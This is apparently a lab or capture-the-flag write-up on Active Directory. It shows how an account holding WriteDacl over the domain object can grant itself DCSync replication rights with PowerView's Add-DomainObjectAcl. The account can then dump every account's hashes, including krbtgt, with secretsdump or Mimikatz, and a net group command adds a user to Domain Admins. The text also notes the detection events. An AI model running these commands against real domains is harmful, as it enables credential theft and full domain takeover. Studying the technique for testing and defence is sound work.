WriteDACL over DCSync

DCSync is an attack in which an adversary impersonates a domain controller (DC) and asks a real DC to replicate directory data over the normal replication protocol (MS-DRSR, the DRSUAPI GetNCChanges call), which returns account password hashes. Only principals holding the replication extended rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) are allowed to do this; by default that is Domain Admins, Enterprise Admins, Administrators and the DCs themselves. The classic use of DCSync is as a precursor to a Golden Ticket attack, since it retrieves the KRBTGT hash.

If our user, or a group our user belongs to, has WriteDacl over the domain object (for example DC=htb,DC=local), we can write a new ACE into its DACL and grant ourselves the replication rights DCSync needs. We need valid credentials for the account that holds WriteDacl, and PowerView loaded in the session, since Add-DomainObjectAcl is a PowerView cmdlet:

# PowerView must be loaded first; Add-DomainObjectAcl comes from PowerView.ps1
Import-Module .\PowerView.ps1
$pass = ConvertTo-SecureString '<our-users-password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAINNAME\<our-user>', $pass)
# -TargetIdentity is the domain object we hold WriteDacl over; -PrincipalIdentity is who receives the rights.
# -Rights DCSync adds the DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and
# DS-Replication-Get-Changes-In-Filtered-Set ACEs for that principal.
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity <our-user> -Rights DCSync

Then all we need to do is run Impacket's secretsdump.py (or Mimikatz's lsadump::dcsync) with the same credentials against a DC, and we should be able to dump every account's hashes, including krbtgt. Note that this leaves a visible trace: the new ACE sits in the domain object's DACL (Event ID 5136 if directory service changes are audited), and the replication request itself shows up as Event ID 4662 with the replication GUIDs from a non-DC account.

A noisier alternative, if the account we control also has the right to modify the group's membership (WriteDacl on the domain object alone does not give this, because Domain Admins is protected by AdminSDHolder and does not inherit permissions from the domain), is to add our user to Domain Admins directly:

net group "Domain admins" <user> /add /domain
